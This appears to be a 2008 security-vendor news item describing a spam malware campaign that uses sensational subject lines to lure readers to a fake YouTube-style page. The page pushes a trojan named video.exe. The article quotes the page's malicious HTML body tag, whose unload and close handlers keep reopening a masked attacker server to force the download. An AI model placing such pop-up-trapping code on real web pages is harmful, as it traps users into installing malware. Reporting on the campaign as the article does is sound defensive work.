|
|||||||||||
|
|
News & Press releases
| Press releases & general news | |
 |
Press & Company News |
|
General news |
|
In the press |
19 June 2008
The latest malware outbreak sends emails with subject lines such as: Paris Hilton found to be gay!, China Earthquake claims 1 million lives, Star Trek star dies at age 79, Man wakes up from 40 year coma, Batman latest movie bombs at box office or Italy knocked out of Euro 2008 tries to attract us. So far, over 500 emails have been intercepted within 40 minutes.
The email content is on two lines only. Content can be anything like “Don’t belittle the effects of power enlargement ” to “Don’t make the postman make too many attempted deliveries to get you the herbal solution that will change your life” or “Heir to Prada empire found strangled”.
The malicious link is in the format of http://****.de/r.html and this will redirect you to PornTube, a YouTube design ripp off.
And no, we are not giving you a full screenshot of this web site.
Once you get there, a link behind the scenes is made to a server IP xx.xxx.xx.xx/index.php with some scripting in the HTML body tag:
<body onbeforeunload=”window.open(’http://xx.xxx.xx.xx/index.php’);” onunload=”window.open(’http://xx.xxx.xx.xx/index.php’);” onclose=”window.open(’http://xx.xxx.xx.xx/index.php’);” id=”mainbody”>
With this connection will try to download the file video.exe directly to your computer. Some pop up windows will appear stating that you need to download an ActiveX Object to run the videos and it doesn’t matter if you click Cancel or No, you get stuck in a loop until you download the video.exe. Closing down your windows or browser is the only option. Andf you get a new browser window opening the browser at this server again.
Iit appears that the URLs http://****.de/r.html used in this malware outbreak, which are changing quite rapidly, could be in fact hacked servers hosting valid web sites where the r.html file is placed in the web hosting root of the site. Some images are missing and that’s why the design of PornTube isn’t exactly like the design of YouTube.
The IP address where the malware is hosted is according to a WHOIS registered in Amsterdam, The Netherlands. The video.exe is a variant Trojan.Downloader.Win32Agent.tyw. This trojan will download and install other malware on an infected computer.